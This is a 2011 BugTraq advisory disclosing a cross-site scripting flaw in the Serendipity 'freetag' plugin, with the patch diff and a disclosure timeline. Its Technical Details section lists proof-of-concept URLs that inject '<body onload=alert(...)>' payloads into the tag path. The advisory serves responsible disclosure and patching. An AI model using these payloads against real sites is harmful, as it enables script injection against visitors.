BugTraq
Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag" May 31 2011 10:28AM
sschurtz t-online de
Advisory: Cross-Site Scripting vulnerability in Serendipity Plugin "serendipity_event_freetag"

Advisory ID: SSCHADV2011-004

Author: Stefan Schurtz

Affected Software: Successfully tested on: Serendipity 1.5.5 with serendipity_event_freetag - version 3.21

Vendor URL: http://www.s9y.org

Vendor Status: Version 3.22 - Fix possible XSS

CVE-ID: -

==========================

Vulnerability Description:

==========================

This is Cross-Site Scripting vulnerability

==================

Technical Details:

==================

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(666)>

http://www.example.com/serendipity/index.php?/plugin/tag/hallo=><body onload=alert(String.fromCharCode(88,83,83))>

http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(666)>

http://www.example.com/serendipity/index.php?/plugin/tag/<body onload=alert(String.fromCharCode(88,83,83))>

=========

Solution:

=========

Update to the latest version 3.22

diff serendipity_event_freetag.php

< <?php #$Id: serendipity_event_freetag.php,v 1.148 2011/05/09 08:19:30 garvinhicking Exp $

> <?php #$Id: serendipity_event_freetag.php,v 1.149 2011/05/30 20:25:24 garvinhicking Exp $

< $propbag->add('version', '3.21');

> $propbag->add('version', '3.22');

< $serendipity['smarty']->assign('freetag_tagTitle', is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag);

> $serendipity['smarty']->assign('freetag_tagTitle', htmlspecialchars(is_array($this->displayTag) ? implode(' + ',$this->displayTag) : $this->displayTag));

====================

Disclosure Timeline:

====================

30-May-2011 - informed developers

30-May-2011 - Release date of this security advisory

30-May-2011 - Version 3.22 - Fix possible XSS

31-May-2011 - post on BugTraq and Full-disclosure

========

Credits:

========

Vulnerability found and advisory written by Stefan Schurtz.

===========

References:

===========

http://www.s9y.org

http://blog.s9y.org/archives/231-serendipity_event_freetag-Plugin-update
,-XSS-bug.html

http://www.rul3z.de/advisories/SSCHADV2011-004.txt

http://ha.ckers.org/xss.html

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus